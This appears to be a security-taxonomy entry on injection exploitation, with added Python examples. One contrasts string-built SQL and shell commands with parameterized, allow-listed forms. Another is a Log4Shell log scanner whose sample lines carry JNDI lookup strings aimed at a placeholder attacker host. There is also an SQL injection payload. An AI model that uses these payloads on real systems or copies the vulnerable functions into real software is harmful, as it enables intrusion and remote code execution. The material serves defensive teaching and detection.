Injection Exploitations
Info
ID: AT-PE001
Tactic: Payload Execution
Sub-techniques: Arbitrary File Write Exploitation, CRLF Injection, Expression Language Injection, LDAP Injection, NoSQL Injection, OGNL Injection, OS Command Injection, SQL Injection, Template Injection, XML Injection, XXE Injection
Injection Exploitations
Injection Exploitations encompass techniques whereby adversaries manipulate application inputs to alter the intended processing of commands, queries, or data. By crafting carefully tailored malicious inputs, attackers can coerce applications into interpreting injected payloads that lead to unintended behaviors or data alterations. Unlike Remote Code Execution Exploitation, which directly grants operational control of the application’s execution flow, Injection Exploitations focus on subverting input handling and processing mechanisms to indirectly facilitate further compromise.
Sub-techniques under Injection Exploitations include OS Command Injection, Arbitrary File Write Exploitation, LDAP Injection, XML Injection, XXE Injection, OGNL Injection, CRLF Injection, Template Injection, SQL Injection, NoSQL Injection, and Expression Language Injection. Mitigations involve strict input validation, secure coding practices that keep untrusted data separate from the command or query being built, and comprehensive testing to ensure that all external inputs are properly sanitized and managed.
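The following is an added example, not code from this taxonomy page, illustrating the mitigation the paragraph above names for two of the listed sub-techniques: a string-built SQL query beside its parameterized form, and a shell-string command beside an argument-list form with allow-list validation. The in-memory user table, the hostname rule and the function names are constructed for the demonstration.

```python
"""Vulnerable-versus-hardened input handling for SQL Injection and OS
Command Injection. Added example (not from the page); standard library only."""
import re
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for an application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_user_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """String concatenation lets the input change the query's structure:
    a quote character in `name` ends the literal and the rest becomes SQL."""
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(query)]


def lookup_user_hardened(conn: sqlite3.Connection, name: str) -> list:
    """A bound parameter is always treated as data, never as SQL, so the
    query structure is fixed at authoring time regardless of the input."""
    query = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (name,))]


# Constructed allow-list: DNS labels of letters, digits and interior hyphens.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_command_vulnerable(host: str) -> str:
    """Building a shell string from input lets shell metacharacters (such as
    ';' or '|') append further commands. Returned, not executed, so the
    two forms can be compared safely."""
    return "ping -c 1 " + host


def ping_command_hardened(host: str) -> list:
    """Return an argv list suitable for subprocess.run(args, shell=False):
    the host is a single argument, so metacharacters carry no meaning, and
    anything that is not a plausible hostname is rejected up front."""
    if not _HOSTNAME.match(host):
        raise ValueError("rejected: not a valid hostname")
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    db = build_demo_db()
    crafted = "x' OR '1'='1"
    print("vulnerable:", lookup_user_vulnerable(db, crafted))  # every row
    print("hardened:  ", lookup_user_hardened(db, crafted))    # no rows
    print(ping_command_hardened("example.com"))
```

The contrast is the point: the hardened SQL lookup returns nothing for the crafted input because the quote character never reaches the parser as syntax, and the hardened command builder never hands a string to a shell at all.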
Examples in the Wild
Notable Injection Exploitation Attacks:
Log4Shell
The Log4Shell vulnerability demonstrated sophisticated injection exploitation through JNDI LDAP lookup strings. By injecting specially crafted strings containing ${jndi:ldap://...} patterns into logged data, attackers could trigger the Log4j library to make LDAP requests to attacker-controlled servers. These servers would respond with malicious Java code that would then be executed by the vulnerable application, effectively turning a simple logging operation into a remote code execution vector.
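As an added example (not code from this page), the check below scans log lines for the JNDI lookup pattern the paragraph above describes and reports the line number, the scheme requested and the matched text. The log lines are constructed, and `attacker.example` is a placeholder host; the regular expression matches only the plain `${jndi:<scheme>:` form the page mentions, so it is a baseline detection to run alongside patching, not a substitute for it.

```python
"""Detect JNDI lookup strings in log data. Added example; the sample log
lines are constructed and the hostnames are placeholders."""
import re

# A lookup starts with "${"; the jndi: prefix selects the JNDI resolver and
# the scheme (ldap, ldaps, rmi, dns, ...) follows the next colon.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)

# Constructed access-log excerpt: line 2 carries the lookup in the
# User-Agent field, line 3 in the query string, the others are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?x=${JNDI:RMI://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.7 - - [10/Dec/2021:10:00:04 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def find_jndi_lookups(log_text: str) -> list:
    """Return (line_number, scheme, matched_text) for every lookup found."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in JNDI_LOOKUP.finditer(line):
            hits.append((lineno, m.group(1).lower(), m.group(0)))
    return hits


def summarize_by_scheme(hits: list) -> dict:
    """Count hits per scheme, useful for a quick triage view."""
    counts = {}
    for _, scheme, _ in hits:
        counts[scheme] = counts.get(scheme, 0) + 1
    return counts


if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOG)
    for lineno, scheme, text in found:
        print(f"line {lineno}: scheme={scheme} match={text!r}")
    print(summarize_by_scheme(found))
```

Because the lookup can arrive in any logged field (headers, query strings, form values), the scan runs over whole lines rather than a single field, and it is case-insensitive since the lookup prefix is not case-sensitive in the affected library.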
XZ-Utils Backdoor
The XZ-Utils backdoor leveraged injection techniques to compromise the widely used xz compression library. The attack involved injecting malicious code into build scripts and test files, using multiple layers of obfuscation including RC4 encryption and XZ compression. The injected code specifically targeted SSH authentication mechanisms, demonstrating how injection attacks can be used to compromise critical security infrastructure.